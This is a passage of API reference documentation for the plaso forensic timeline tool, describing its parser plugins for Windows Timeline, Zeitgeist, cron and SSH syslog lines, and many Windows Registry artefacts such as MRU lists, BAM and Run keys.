TEXT, [PlatformDeviceId] TEXT, [CreatedInCloud] DATETIME, [StartTime] DATETIME NOT NULL, [EndTime] DATETIME, [LastModifiedOnClient] DATETIME NOT NULL, [CorrelationVector] TEXT, [GroupAppActivityId] TEXT, [ClipboardPayload] BLOB, [EnterpriseId] TEXT, [OriginalPayload] BLOB, [OriginalLastModifiedOnClient] DATETIME, [ETag] INT NOT NULL)', 'Activity_PackageId': 'CREATE TABLE [Activity_PackageId]([ActivityId] GUID NOT NULL, [Platform] TEXT NOT NULL, [PackageName] TEXT NOT NULL, [ExpirationTime] DATETIME NOT NULL)', 'AppSettings': 'CREATE TABLE [AppSettings]([AppId] TEXT PRIMARY KEY NOT NULL, [SettingsPropertyBag] BLOB, [AppTitle] TEXT, [Logo4141] TEXT)', 'ManualSequence': 'CREATE TABLE [ManualSequence]([Key] TEXT PRIMARY KEY NOT NULL, [Value] INT NOT NULL)', 'Metadata': 'CREATE TABLE [Metadata]([Key] TEXT PRIMARY KEY NOT NULL, [Value] TEXT)'}]

class plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventDataBases: plaso.containers.events.EventData

Windows Timeline database User Engaged event data.

Contains information describing how long a user interacted with an application for.

package_identifierthe package ID or location of the executable the user interacted with.

Type str

reporting_appthe name of the application that reported the user’s interaction. This is the name of a monitoring tool, forexample “ShellActivityMonitor”.

Type str

active_duration_secondsthe number of seconds the user spent interacting with the program.

Type int

DATA_TYPE = 'windows:timeline:user_engaged'

plaso.parsers.sqlite_plugins.zeitgeist module

SQLite parser plugin for Zeitgeist activity database files.

class plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Zeitgeist activity database files.

Zeitgeist is a service which logs the user activities and events, anywhere from files opened to websites visitedand conversations.

DATA_FORMAT = 'Zeitgeist activity SQLite database file'

NAME = 'zeitgeist'

ParseZeitgeistEventRow(parser_mediator, query, row, **unused_kwargs)Parses a zeitgeist event row.

Parameters






QUERIES = [('SELECT id, timestamp, subj_uri FROM event_view', 'ParseZeitgeistEventRow')]

REQUIRED_STRUCTURE = {'actor': frozenset({}), 'event': frozenset({'id', 'timestamp'}), 'event_view': frozenset({'id', 'subj_uri', 'timestamp'})}

SCHEMAS = [{'actor': 'CREATE TABLE actor ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'event': 'CREATE TABLE event ( id INTEGER, timestamp INTEGER, interpretation INTEGER, manifestation INTEGER, actor INTEGER, payload INTEGER, subj_id INTEGER, subj_interpretation INTEGER, subj_manifestation INTEGER, subj_origin INTEGER, subj_mimetype INTEGER, subj_text INTEGER, subj_storage INTEGER, origin INTEGER, subj_id_current INTEGER, CONSTRAINT interpretation_fk FOREIGN KEY(interpretation) REFERENCES interpretation(id) ON DELETE CASCADE, CONSTRAINT manifestation_fk FOREIGN KEY(manifestation) REFERENCES manifestation(id) ON DELETE CASCADE, CONSTRAINT actor_fk FOREIGN KEY(actor) REFERENCES actor(id) ON DELETE CASCADE, CONSTRAINT origin_fk FOREIGN KEY(origin) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT payload_fk FOREIGN KEY(payload) REFERENCES payload(id) ON DELETE CASCADE, CONSTRAINT subj_id_fk FOREIGN KEY(subj_id) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_id_current_fk FOREIGN KEY(subj_id_current) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_interpretation_fk FOREIGN KEY(subj_interpretation) REFERENCES interpretation(id) ON DELETE CASCADE, CONSTRAINT subj_manifestation_fk FOREIGN KEY(subj_manifestation) REFERENCES manifestation(id) ON DELETE CASCADE, CONSTRAINT subj_origin_fk FOREIGN KEY(subj_origin) REFERENCES uri(id) ON DELETE CASCADE, CONSTRAINT subj_mimetype_fk FOREIGN KEY(subj_mimetype) REFERENCES mimetype(id) ON DELETE CASCADE, CONSTRAINT subj_text_fk FOREIGN KEY(subj_text) REFERENCES text(id) ON DELETE CASCADE, CONSTRAINT subj_storage_fk FOREIGN KEY(subj_storage) REFERENCES storage(id) ON DELETE CASCADE, CONSTRAINT unique_event UNIQUE (timestamp, interpretation, manifestation, actor, subj_id) )', 'extensions_conf': 'CREATE TABLE extensions_conf ( extension VARCHAR, key VARCHAR, value BLOB, CONSTRAINT unique_extension UNIQUE (extension, key) )', 'interpretation': 'CREATE TABLE interpretation ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'manifestation': 'CREATE TABLE manifestation ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'mimetype': 'CREATE TABLE mimetype ( id INTEGER PRIMARY KEY AUTOINCREMENT, value VARCHAR UNIQUE )', 'payload': 'CREATE TABLE payload (id INTEGER PRIMARY KEY, value BLOB)', 'schema_version': 'CREATE TABLE schema_version ( schema VARCHAR PRIMARY KEY ON CONFLICT REPLACE, version INT )', 'storage': 'CREATE TABLE storage ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE, state INTEGER, icon VARCHAR, display_name VARCHAR )', 'text': 'CREATE TABLE text ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE )', 'uri': 'CREATE TABLE uri ( id INTEGER PRIMARY KEY, value VARCHAR UNIQUE )'}]

class plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityEventDataBases: plaso.containers.events.EventData

Zeitgeist activity event data.

subject_urisubject URI.

Type str

DATA_TYPE = 'zeitgeist:activity'

Module contents

Imports for the SQLite database parser plugins.

plaso.parsers.syslog_plugins package

Submodules

plaso.parsers.syslog_plugins.cron module

This file contains a plugin for cron syslog entries.

class plaso.parsers.syslog_plugins.cron.CronSyslogPluginBases: plaso.parsers.syslog_plugins.interface.SyslogPlugin

A syslog plugin for parsing cron messages.

DATA_FORMAT = 'Cron syslog line'

MESSAGE_GRAMMARS = [('task_run', {{{{{{{"(" W:(ABCD...)} ")"} "CMD"} "("} Combine:(SkipTo:({")" StringEnd}))} ")"} StringEnd})]

NAME = 'cron'

ParseMessage(parser_mediator, key, date_time, tokens)Parses a syslog body that matched one of defined grammars.

Parameters


• key (str) – name of the matching grammar.

• date_time (dfdatetime.DateTimeValues) – date and time values.

• tokens (dict[str, str]) – tokens derived from a syslog message based on thedefined grammar.



Raises ValueError – If an unknown key is provided.

REPORTER = 'CRON'

class plaso.parsers.syslog_plugins.cron.CronTaskRunEventDataBases: plaso.parsers.syslog.SyslogLineEventData

Cron task run event data.

commandcommand executed.

Type str

usernamename of user the command was executed.

Type str

DATA_TYPE = 'syslog:cron:task_run'

plaso.parsers.syslog_plugins.interface module

This file contains the interface for syslog plugins.

class plaso.parsers.syslog_plugins.interface.SyslogPluginBases: plaso.parsers.plugins.BasePlugin

The interface for syslog plugins.

DATA_FORMAT = 'Syslog file'

MESSAGE_GRAMMARS = []

NAME = 'syslog_plugin'

abstract ParseMessage(parser_mediator, key, date_time, tokens)Parses a syslog body that matched one of the grammars the plugin defined.

Parameters


• key (str) – name of the parsed structure.


• tokens (dict[str, str]) – names of the fields extracted by the syslog parser andthe matching grammar, and values are the values of those fields.

Process(parser_mediator, date_time, syslog_tokens, **kwargs)Processes the data structure produced by the parser.

Parameters



• syslog_tokens (dict[str, str]) – names of the fields extracted by the syslogparser and the matching grammar, and values are the values of those fields.

Raises



• AttributeError – If the syslog_tokens do not include a ‘body’ attribute.

• WrongPlugin – If the plugin is unable to parse the syslog tokens.

REPORTER = ''

plaso.parsers.syslog_plugins.ssh module

This file contains a plugin for SSH syslog entries.

class plaso.parsers.syslog_plugins.ssh.SSHEventDataBases: plaso.parsers.syslog.SyslogLineEventData

SSH event data.

addressIP address.

Type str

authentication_methodauthentication method.

Type str

fingerprintfingerprint.

Type str

portport.

Type str

protocolprotocol.

Type str

usernamename of user the command was executed.

Type str

class plaso.parsers.syslog_plugins.ssh.SSHFailedConnectionEventDataBases: plaso.parsers.syslog_plugins.ssh.SSHEventData

SSH failed connection event data.

DATA_TYPE = 'syslog:ssh:failed_connection'

class plaso.parsers.syslog_plugins.ssh.SSHLoginEventDataBases: plaso.parsers.syslog_plugins.ssh.SSHEventData

SSH login event data.

DATA_TYPE = 'syslog:ssh:login'

class plaso.parsers.syslog_plugins.ssh.SSHOpenedConnectionEventDataBases: plaso.parsers.syslog_plugins.ssh.SSHEventData

SSH opened connection event data.

DATA_TYPE = 'syslog:ssh:opened_connection'



class plaso.parsers.syslog_plugins.ssh.SSHSyslogPluginBases: plaso.parsers.syslog_plugins.interface.SyslogPlugin

A plugin for creating events from syslog message produced by SSH.

DATA_FORMAT = 'SSH syslog line'

MESSAGE_GRAMMARS = [('login', {{{{{{{{{{"Accepted" {"password" | "publickey"}} "for"} W:(ABCD...)} "from"} {IPv4 address | IPv6 address}} "port"} W:(0123...)} "ssh2"} [{":" Combine:({"RSA " W:(:012...)})}]} StringEnd}), ('failed_connection', {{{{{{{{"Failed" {"password" | "publickey"}} "for"} W:(ABCD...)} "from"} {IPv4 address | IPv6 address}} "port"} W:(0123...)} StringEnd}), ('opened_connection', {{{{"Connection from" {IPv4 address | IPv6 address}} "port"} W:(0123...)} LineEnd})]

NAME = 'ssh'

ParseMessage(parser_mediator, key, date_time, tokens)Produces an event from a syslog body that matched one of the grammars.

Parameters


• key (str) – name of the matching grammar.


• tokens (dict[str, str]) – tokens derived from a syslog message based on thedefined grammar.

Raises ValueError – If an unknown key is provided.

REPORTER = 'sshd'

Module contents

Imports for the syslog parser.

plaso.parsers.winreg_plugins package

Submodules

plaso.parsers.winreg_plugins.appcompatcache module

Windows Registry plugin to parse the Application Compatibility Cache key.

class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheCachedEntryBases: object

Application Compatibility Cache cached entry.

class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheEventDataBases: plaso.containers.events.EventData

Application Compatibility Cache event data.

entry_indexcache entry index number for the record.

Type int


Type str



pathfull path to the executable.

Type str

DATA_TYPE = 'windows:registry:appcompatcache'

class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheHeaderBases: object

Application Compatibility Cache header.

class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Application Compatibility Cache data Windows Registry plugin.

DATA_FORMAT = 'Application Compatibility Cache Registry data'

ExtractEvents(parser_mediator, registry_key, **kwargs)Extracts events from a Windows Registry key.

Parameters


• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

Raises ParseError – if the value data could not be parsed.

FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})

NAME = 'appcompatcache'

plaso.parsers.winreg_plugins.bagmru module

This file contains BagMRU Windows Registry plugins (shellbags).

class plaso.parsers.winreg_plugins.bagmru.BagMRUEventDataBases: plaso.containers.events.EventData

BagMRU event data attribute container.

entriesmost recently used (MRU) entries.

Type str


Type str

DATA_TYPE = 'windows:registry:bagmru'

class plaso.parsers.winreg_plugins.bagmru.BagMRUWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Class that defines a BagMRU Windows Registry plugin.

DATA_FORMAT = 'BagMRU (or ShellBags) Registry data'

ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)Extracts events from a Windows Registry key.



Parameters



• codepage (Optional[str]) – extended ASCII string codepage.

FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})

NAME = 'bagmru'

plaso.parsers.winreg_plugins.bam module

Windows Registry plugin to parse the Background Activity Moderator keys.

class plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventDataBases: plaso.containers.events.EventData

Background Activity Moderator event data.

binary_pathbinary executed.

Type str

user_siduser SID associated with entry.

Type str

DATA_TYPE = 'windows:registry:bam'

class plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Background Activity Moderator data Windows Registry plugin.

DATA_FORMAT = 'Background Activity Moderator (BAM) Registry data'


Parameters



Raises ParseError – if the value data could not be parsed.


NAME = 'bam'



plaso.parsers.winreg_plugins.ccleaner module

Parser for the CCleaner Registry key.

class plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventDataBases: plaso.containers.events.EventData

CCleaner configuration event data.

configurationCCleaner configuration.

Type str


Type str

DATA_TYPE = 'ccleaner:configuration'

class plaso.parsers.winreg_plugins.ccleaner.CCleanerPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Gathers the CCleaner Keys for NTUSER hive.

Known Windows Registry values within the CCleaner key: * (App)Cookies [REG_SZ], contains “True” ifthe cookies should be cleaned; * (App)Delete Index.dat files [REG_SZ] * (App)History [REG_SZ] * (App)LastDownload Location [REG_SZ] * (App)Other Explorer MRUs [REG_SZ] * (App)Recent Documents [REG_SZ]* (App)Recently Typed URLs [REG_SZ] * (App)Run (in Start Menu) [REG_SZ] * (App)Temporary InternetFiles [REG_SZ] * (App)Thumbnail Cache [REG_SZ] * CookiesToSave [REG_SZ] * UpdateKey [REG_SZ],contains a date and time formatted as:

“MM/DD/YYYY hh:mm:ss [A|P]M”, for example “07/13/2013 10:03:14 AM”;

• WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels;

• WINDOW_LEFT [REG_SZ]

• WINDOW_MAX [REG_SZ]

• WINDOW_TOP [REG_SZ]

• WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;

Also see: http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html

DATA_FORMAT = 'CCleaner Registry data'


Parameters



FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})

NAME = 'ccleaner'


http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html


class plaso.parsers.winreg_plugins.ccleaner.CCleanerUpdateEventDataBases: plaso.containers.events.EventData

CCleaner update event data.


Type str

DATA_TYPE = 'ccleaner:update'

plaso.parsers.winreg_plugins.default module

The default Windows Registry plugin.

class plaso.parsers.winreg_plugins.default.DefaultPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Default plugin that extracts minimum information from every registry key.

The default plugin will parse every registry key that is passed to it and extract minimum information, such as alist of available values and if possible content of those values. The timestamp used is the timestamp when theregistry key was last modified.

DATA_FORMAT = 'Windows Registry data'


Parameters



NAME = 'winreg_default'

plaso.parsers.winreg_plugins.dtfabric_plugin module


class plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin


A dtFabric-based data format Windows Registry parser plugin defines its data format structures in dtFabricdefinition file, for example “dtfabric.yaml”:


signed

size4

unitsbytes




little-endian

members: - name: x











abstract ExtractEvents(parser_mediator, registry_key, **kwargs)Extracts events from a Windows Registry key.

Parameters



plaso.parsers.winreg_plugins.interface module

The Windows Registry plugin interface.

class plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilterBases: object

The Windows Registry key filter interface.

abstract Match(registry_key)Determines if a Windows Registry key matches the filter.

Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

Returns True if the keys match.

Return type bool

property key_pathskey paths defined by the filter.

Type list[str]



class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter(key_path)Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter

Windows Registry key path filter.

Match(registry_key)Determines if a Windows Registry key matches the filter.



Return type bool

property key_pathsList of key paths defined by the filter.

class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathPrefixFilter(key_path_prefix)Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter

Windows Registry key path prefix filter.




Return type bool

class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathSuffixFilter(key_path_suffix)Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter

Windows Registry key path suffix filter.




Return type bool

class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter(value_names)Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter

Windows Registry key with values filter.




Return type bool

class plaso.parsers.winreg_plugins.interface.WindowsRegistryPluginBases: plaso.parsers.plugins.BasePlugin

The Windows Registry plugin interface.

DATA_FORMAT = 'Windows Registry data'

abstract ExtractEvents(parser_mediator, registry_key, **kwargs)Extracts events from a Windows Registry key.



Parameters



FILTERS = frozenset({})

NAME = 'winreg_plugin'

Process(parser_mediator, registry_key, **kwargs)Processes a Windows Registry key or value.

Parameters



Raises ValueError – If the Windows Registry key is not set.

UpdateChainAndProcess(parser_mediator, registry_key, **kwargs)Updates the parser chain and processes a Windows Registry key or value.

Parameters



Raises ValueError – If the Windows Registry key is not set.

plaso.parsers.winreg_plugins.lfu module

Plug-in to collect the Less Frequently Used Keys.

class plaso.parsers.winreg_plugins.lfu.BootExecutePluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Plug-in to collect the BootExecute Value from the Session Manager key.

Also see: http://technet.microsoft.com/en-us/library/cc963230.aspx

DATA_FORMAT = 'Boot Execution Registry data'


Parameters




NAME = 'windows_boot_execute'

class plaso.parsers.winreg_plugins.lfu.BootVerificationPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Plug-in to collect the Boot Verification Key.


http://technet.microsoft.com/en-us/library/cc963230.aspx


Also see: http://technet.microsoft.com/en-us/library/cc782537(v=ws.10).aspx

DATA_FORMAT = 'Windows boot verification Registry data'


Parameters




NAME = 'windows_boot_verify'

class plaso.parsers.winreg_plugins.lfu.WindowsBootExecuteEventDataBases: plaso.containers.events.EventData

Windows Boot Execute event data attribute container.


Type str

valueboot execute value, contains the value obtained from the BootExecute Registry value.

Type str

DATA_TYPE = 'windows:registry:boot_execute'

class plaso.parsers.winreg_plugins.lfu.WindowsBootVerificationEventDataBases: plaso.containers.events.EventData

Windows Boot Verification event data attribute container.

image_pathlocation of the boot verification executable, contains the value obtained from the ImagePath Registry value.

Type str


Type str

DATA_TYPE = 'windows:registry:boot_verification'

plaso.parsers.winreg_plugins.mountpoints module

MountPoints2 Windows Registry parser plugin.

class plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventDataBases: plaso.containers.events.EventData

Windows MountPoints2 event data attribute container.


Type str


http://technet.microsoft.com/en-us/library/cc782537(v=ws.10).aspx


labelmount point label.

Type str

namename of the mount point source.

Type str

server_namename of the remote drive server or None if not set.

Type str

share_namename of the remote drive share or None if not set.

Type str

typetype of the mount point source, which can be “Drive”, “Remove Drive” or “Volume”.

Type str

DATA_TYPE = 'windows:registry:mount_points2'

class plaso.parsers.winreg_plugins.mountpoints.MountPoints2PluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin for parsing the MountPoints2 key.

DATA_FORMAT = 'Windows Explorer mount points Registry data'


Parameters




NAME = 'explorer_mountpoints2'

plaso.parsers.winreg_plugins.mrulist module

This file contains a MRUList Registry plugin.

Also see: https://github.com/libyal/winreg-kb/blob/master/documentation/MRU%20keys.asciidoc

class plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Class for common MRUList Windows Registry plugin functionality.

class plaso.parsers.winreg_plugins.mrulist.MRUListEventDataBases: plaso.containers.events.EventData

MRUList event data attribute container.


https://github.com/libyal/winreg-kb/blob/master/documentation/MRU%20keys.asciidoc



Type str


Type str

DATA_TYPE = 'windows:registry:mrulist'

class plaso.parsers.winreg_plugins.mrulist.MRUListShellItemListWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin

Windows Registry plugin to parse a shell item list MRUList.

DATA_FORMAT = 'Most Recently Used (MRU) Registry data'


Parameters





NAME = 'mrulist_shell_item_list'

class plaso.parsers.winreg_plugins.mrulist.MRUListStringRegistryKeyFilterBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter




Returns True if the Windows Registry key matches the filter.

Return type bool

class plaso.parsers.winreg_plugins.mrulist.MRUListStringWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin

Windows Registry plugin to parse a string MRUList.



Parameters






FILTERS = frozenset({<plaso.parsers.winreg_plugins.mrulist.MRUListStringRegistryKeyFilter object>})

NAME = 'mrulist_string'

plaso.parsers.winreg_plugins.mrulistex module

This file contains MRUListEx Windows Registry plugins.

Also see: https://github.com/libyal/winreg-kb/blob/master/documentation/MRU%20keys.asciidoc

class plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Class for common MRUListEx Windows Registry plugin functionality.

class plaso.parsers.winreg_plugins.mrulistex.MRUListExEventDataBases: plaso.containers.events.EventData

MRUListEx event data attribute container.


Type str


Type str

DATA_TYPE = 'windows:registry:mrulistex'

class plaso.parsers.winreg_plugins.mrulistex.MRUListExShellItemListWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

Windows Registry plugin to parse a shell item list MRUListEx.



Parameters





NAME = 'mrulistex_shell_item_list'

class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemListWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

Windows Registry plugin to parse a string and shell item list MRUListEx.



Parameters


https://github.com/libyal/winreg-kb/blob/master/documentation/MRU%20keys.asciidoc






NAME = 'mrulistex_string_and_shell_item_list'

class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

Windows Registry plugin to parse a string and shell item MRUListEx.



Parameters





NAME = 'mrulistex_string_and_shell_item'

class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringRegistryKeyFilterBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter




Returns True if the Windows Registry key matches the filter.

Return type bool

class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

Windows Registry plugin to parse a string MRUListEx.



Parameters




FILTERS = frozenset({<plaso.parsers.winreg_plugins.mrulistex.MRUListExStringRegistryKeyFilter object>})



NAME = 'mrulistex_string'

plaso.parsers.winreg_plugins.msie_zones module

This file contains the MSIE zone settings plugin.

class plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsEventDataBases: plaso.containers.events.EventData

MSIE zone settings event data attribute container.


Type str

settingsMSIE zone settings.

Type str

DATA_TYPE = 'windows:registry:msie_zone_settings'

class plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin for parsing the MSIE zone settings.

The MSIE Feature controls are stored in the Zone specific subkeys in: Internet SettingsZones key InternetSettingsLockdown_Zones key

Also see: http://support.microsoft.com/kb/182569

DATA_FORMAT = 'Microsoft Internet Explorer zone settings Registry data'


Parameters



FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})

NAME = 'msie_zone'

plaso.parsers.winreg_plugins.network_drives module

This file contains the Network drive Registry plugin.

class plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventDataBases: plaso.containers.events.EventData

Network drive event data attribute container.

drive_letterdrive letter assigned to network drive.

Type str


http://support.microsoft.com/kb/182569



Type str

server_namename of the server of the network drive.

Type str

share_namename of the share of the network drive.

Type str

DATA_TYPE = 'windows:registry:network_drive'

class plaso.parsers.winreg_plugins.network_drives.NetworkDrivesPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin for parsing the Network key.

DATA_FORMAT = 'Windows network drives Registry data'


Parameters




NAME = 'network_drives'

plaso.parsers.winreg_plugins.networks module

This file contains the NetworkList Registry plugin.

class plaso.parsers.winreg_plugins.networks.NetworksWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Windows Registry plugin for parsing the NetworkList key.

DATA_FORMAT = 'Windows networks (NetworkList) Registry data'


Parameters




NAME = 'networks'



class plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventDataBases: plaso.containers.events.EventData

Windows NetworkList event data.

connection_typetype of connection.

Type str

default_gateway_macMAC address for the default gateway.

Type str

descriptiondescription of the wireless connection.

Type str

dns_suffixDNS suffix.

Type str

ssidSSID of the connection.

Type str

DATA_TYPE = 'windows:registry:network'

plaso.parsers.winreg_plugins.officemru module

“Windows Registry plugin for the Microsoft Office MRU.

class plaso.parsers.winreg_plugins.officemru.OfficeMRUListWindowsRegistryEventDataBases: plaso.containers.events.EventData

Microsoft Office MRU list Windows Registry event data.


Type str


Type str

DATA_TYPE = 'windows:registry:office_mru_list'

class plaso.parsers.winreg_plugins.officemru.OfficeMRUPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Plugin that parses Microsoft Office MRU keys.

DATA_FORMAT = 'Microsoft Office MRU Registry data'


Parameters





FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})

NAME = 'microsoft_office_mru'

class plaso.parsers.winreg_plugins.officemru.OfficeMRUWindowsRegistryEventDataBases: plaso.containers.events.EventData

Microsoft Office MRU Windows Registry event data.


Type str

value_stringMRU value.

Type str

DATA_TYPE = 'windows:registry:office_mru'

plaso.parsers.winreg_plugins.outlook module

This file contains an Outlook search MRU Registry parser.

class plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUEventDataBases: plaso.containers.events.EventData

Outlook search MRU event data attribute container.


Type str


Type str

DATA_TYPE = 'windows:registry:outlook_search_mru'

class plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin parsing Outlook Search MRU keys.

DATA_FORMAT = 'Microsoft Outlook search MRU Registry data'


Parameters






NAME = 'microsoft_outlook_mru'

plaso.parsers.winreg_plugins.programscache module

Windows Registry plugin to parse the Explorer ProgramsCache key.

class plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheEventDataBases: plaso.containers.events.EventData

Explorer ProgramsCache event data attribute container.

entriesentries in the program cache.

Type str


Type str

known_folder_identifierknown folder identifier.

Type str

value_nameWindows Registry value name.

Type str

DATA_TYPE = 'windows:registry:explorer:programcache'

class plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Class that parses the Explorer ProgramsCache Registry data.

DATA_FORMAT = 'Windows Explorer Programs Cache Registry data'


Parameters




NAME = 'explorer_programscache'



plaso.parsers.winreg_plugins.run module

This file contains the Run/RunOnce key plugins for Plaso.

class plaso.parsers.winreg_plugins.run.AutoRunsPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin for parsing user specific auto runs.

Also see: http://msdn.microsoft.com/en-us/library/aa376977(v=vs.85).aspx

DATA_FORMAT = 'Run and run once Registry data'


Parameters



FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})

NAME = 'windows_run'

class plaso.parsers.winreg_plugins.run.RunKeyEventDataBases: plaso.containers.events.EventData

Run/RunOnce key event data attribute container.

